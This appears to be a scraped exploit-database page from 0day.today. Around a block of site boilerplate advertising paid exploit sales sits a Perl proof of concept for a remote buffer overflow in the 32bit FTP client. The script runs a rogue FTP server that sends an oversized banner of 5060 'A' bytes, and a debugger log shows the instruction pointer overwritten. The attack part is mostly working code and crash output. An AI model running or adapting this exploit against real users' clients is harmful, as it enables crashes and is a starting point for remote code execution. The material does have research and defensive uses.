0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC
====================================================== 32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC ====================================================== #! /usr/bin/perl # # A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner. # By: Load 99% # Version:09.04.24 # #0:005> g # ... #(9b0.bac): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000 #eip=41414141 esp=0382f018 ebp=0382f050 iopl=0 nv up ei pl nz na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 #41414141 ?? ??? # use IO::Socket::INET; my $socket = IO::Socket::INET->new('LocalPort' => 21, 'Proto' => 'tcp', 'Listen' => SOMAXCONN) or die "Can't create socket ($!)\n"; print "Server listening\n"; $data = "220 ".("\x41" x 5060)."\r\n"; while (my $client = $socket->accept) { print "send> data.\n"; print $client $data; } die "Can't accept socket ($!)\n"; # 0day.today [2024-12-24] #